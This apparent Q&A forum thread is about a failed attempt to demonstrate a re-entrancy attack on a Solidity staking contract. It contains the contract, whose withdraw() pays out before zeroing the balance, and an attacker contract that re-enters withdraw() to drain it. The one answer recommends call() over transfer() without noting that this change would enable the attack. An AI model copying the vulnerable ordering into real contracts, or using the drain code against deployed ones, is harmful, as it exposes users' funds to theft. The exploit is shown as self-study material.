# Failing to Demonstrate a Re-entrancy attack on withdraw function?

Tags: remix, staking, reentrant-attacks

I am constantly getting a revert error while trying to demonstrate a Re-entrancy attack on a staking contract

Here is the staking contract

```
// SPDX-License-Identifier: MIT

pragma solidity  ^0.8.19;

import "@openzeppelin/contracts/utils/math/SafeMath.sol";
import "@openzeppelin/contracts/access/Ownable.sol";
import "@openzeppelin/contracts/utils/Address.sol";
import "hardhat/console.sol";

contract Staking is Ownable {
    using SafeMath for uint256;

    struct Investor {
        uint256 stakedAmount;
        uint256 rewardAmount;
        uint256 availableAmount;    
    }
    Investor[] public investors;
    mapping(address => uint256) public investorIndex;

    struct UnstakeRequest {
        address investor;
        uint256 amount;
        bool isApproved;
        uint256 requestTimestamp;
        uint256 approvedTimestamp;
    }
    UnstakeRequest[] unstakeRequests;
    
    address payable walletAddress;

    constructor(address payable _walletAddress) {
        walletAddress = _walletAddress;
    }

    modifier isStaker() {
        require(investorIndex[msg.sender] != 0, "You are not a staker");
        _;
    }

    // Stake
    function stake() external payable {
        require(msg.value > 0);
        
        if (investorIndex[msg.sender] == 0) {
            // New staker
            Investor memory investor = Investor(msg.value, 0, 0);
            investors.push(investor);
            investorIndex[msg.sender] = investors.length;
        } else {
            // Existing staker
            investors[investorIndex[msg.sender] - 1].stakedAmount += msg.value;
        }
        walletAddress.transfer(msg.value);
    }
    receive() external payable {}
    // UnStake
    function unstake(uint256 _amount) external isStaker {
        require(investors[investorIndex[msg.sender] - 1].stakedAmount >= _amount, "No staked amount to withdraw");
        unstakeRequests.push(UnstakeRequest(msg.sender, _amount, false, block.timestamp, 0));
        investors[investorIndex[msg.sender] - 1].stakedAmount -= _amount;
    }

    function approve(uint256 _index) public onlyOwner {
        require(unstakeRequests.length >= _index);
        investors[investorIndex[unstakeRequests[_index].investor] - 1].availableAmount += unstakeRequests[_index].amount;
        unstakeRequests[_index] = UnstakeRequest(msg.sender, unstakeRequests[_index].amount, true, unstakeRequests[_index].requestTimestamp, block.timestamp);
    }

    function withdraw() external payable isStaker {
        require(investors[investorIndex[msg.sender] - 1].availableAmount > 0, "No amount to withdraw");
        console.log("");
        console.log("Current Balance balance: ", address(this).balance);
        payable(msg.sender).transfer(investors[investorIndex[msg.sender] - 1].availableAmount);
        investors[investorIndex[msg.sender] - 1].availableAmount = 0;
    }


    // Reward
    function distributeRewards() public payable onlyOwner {
        require(msg.value > 0);
        require(getTotalStakedAmount() > 0);

        // Calculate reward per token with 18 decimal places of precision
        uint256 rewardPerToken = msg.value.mul(1e18).div(getTotalStakedAmount());

        for (uint256 i = 0; i < investors.length; i++) {
            investors[i].rewardAmount += investors[i].stakedAmount.mul(rewardPerToken).div(1e18);
        }
    }
    
    function claimRewards() public isStaker {
        require(investors[investorIndex[msg.sender] - 1].rewardAmount > 0);
        payable(msg.sender).transfer(investors[investorIndex[msg.sender] - 1].rewardAmount);
        investors[investorIndex[msg.sender] - 1].rewardAmount = 0;
    }

    // View
    function getInvestors(address _address) public view returns (Investor memory) {
        if (investorIndex[_address] == 0) {
            Investor memory investor;
            return investor;
        } else {
            return investors[investorIndex[_address] - 1];
        }
    }

    function getTotalStakedAmount() public view returns (uint256) {
        uint256 totalStakedAmount;
        for (uint256 i = 0; i < investors.length; i++) {
            totalStakedAmount += investors[i].stakedAmount;
        }
        return totalStakedAmount;
    }

    function getUnStakeRequests() public view returns (UnstakeRequest[] memory) {
        return unstakeRequests;
    }


    // Update Wallet
    function changeWalletAddress(address payable _walletAddress) public onlyOwner {
        walletAddress = _walletAddress;
    }
}
```

Here is the attacker contract trying to exploit the withdraw() function

```
// SPDX-License-Identifier: MIT

pragma solidity  ^0.8.19;

import "./stake.sol";
import "hardhat/console.sol";

interface IStaker {
    function stake() external payable;
    function withdraw() external payable;
    function unstake(uint256 _amount) external;
}

contract Attack {
    
    IStaker public immutable estaking;

    constructor(address _estaking) payable {
        estaking=IStaker(_estaking);
    }

    receive() external payable{
        if(address(estaking).balance >= 1 ether){
            console.log("reentering...");
            estaking.withdraw();
        }
    }

    function unstaker(uint256 _amount) external{
        estaking.unstake(_amount*(1e18));
    }
    
    function attack() external {
        if(address(estaking).balance >= 1){
        estaking.withdraw();}
    }

    function staker() external payable{
        estaking.stake{value:msg.value}();
    }

    function sendEth() external payable{
        (bool sent,) = address(estaking).call{value: msg.value}("");
        require(sent, "Failed to send Ether");
    }

    function viewBalance() external view returns(uint){
        return address(estaking).balance;
    }

    


}
```

The error I am getting is
[image]

Comment: you can remove all unnecessary codes from your question

Answer (score 0):

To send Ether to other contracts, you can use these three methods:

1. transfer (2300 gas, throws an error)
2. send (2300 gas, returns bool)
3. call (forward all gas or set gas, returns bool)

To ensure successful execution, it's recommended to use `call`, as `transfer` and `send` do not allow you to **forward gas**, causing the execution to stop when most of the gas is used.